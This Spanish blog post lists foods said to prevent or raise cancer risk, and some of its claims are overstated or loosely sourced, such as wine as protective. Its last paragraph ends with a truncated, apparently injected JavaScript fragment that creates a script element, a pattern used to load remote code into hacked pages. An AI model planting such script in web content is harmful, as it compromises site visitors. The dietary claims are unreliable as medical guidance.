Salud y belleza » Alimentación, Dieta, Enfermedades, Medicina, Salud

Alimentos que evitan y que producen cáncer

Sin Comentarios

Lazo cáncerEl cáncer tiene múltiples causas, algunas incontrolables como la herencia genética. Sin embargo, hay estilos de vida y dietas que ayudan a evitar esta enfermedad en personas con menos de 65 años. Existen tanto alimentos que aumentan las probabilidades de contraer la enfermedad como otros que disminuyen éstos riesgos. Según El Libro Blanco de los Omega 3, esta sustancia ayuda a evitar que se produzcan células cancerígenas. Está en nuestras manos cambiar los hábitos para adoptar una dieta más saludable y recomendada.

Alimentos recomendados

Los productos antioxidantes y anticancerígenos están presentes en numerosos comestibles: bebidas como el té verde o el vino, frutas y verduras como los tomates, el brécol, la soja, algunos cítricos y los frutos rojos; también son beneficiosos el pescado azul los yogures, el aceite de oliva, las cebollas y los ajos.

Alimentos recomendados

Además, existen alimentos que están recomendados para eludir el cáncer de mama: vegetales (amarillos o naranjas), tomates, semillas de lino, frutos secos con Omega 3, pescados de agua fría y uvas (en lugar de vino).

Alimentos no recomendados

Algunas comidas aumentan las posibilidades de contraer la enfermedad debido a diversas sustancias que las componen. Algunas de esas sustancias son: acrimalida, que se encuentra en galletas, pan y patatas fritas o asadas; ciclamato, que podemos encontrar en productos bajos en grasas, como refrescos de cola sin azúcar, jugos en polvo o jalea; y nitrosaminas, que están presentes en productos como las carnes crudas y fritas, algunos embutidos y el tocino.

Alimentos cancerígenos

Por tanto, sobre todo se recomienda el consumo moderado de alimentos como las patatas fritas, los donuts, los perritos calientes, las galletas, las carnes procesadas y el bacon.

Cualquier exceso o defecto en la toma de estos alimentos producirá un aumento de la incidencia de cáncer en el aparato digestivo, en el páncreas, cáncer de próstata o de mama.

Cáncer por tabacoPero además existen una serie de productos tóxicos y químicos que encontramos a diario a nuestro alrededor y que son propensos a producirnos cáncer. Por ejemplo los disolventes, tintes del pelo, elementos químicos de las sartenes antiadherentes, medicamentos e incluso sustancias químicas en las que bañan nuestras almohadas para evitar la combustión. Y por supuesto no se puede olvidar al perjudicial cigarrillo  que casi con toda seguridad aumenta increíblemente las posibilidades de padecer cáncer.var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.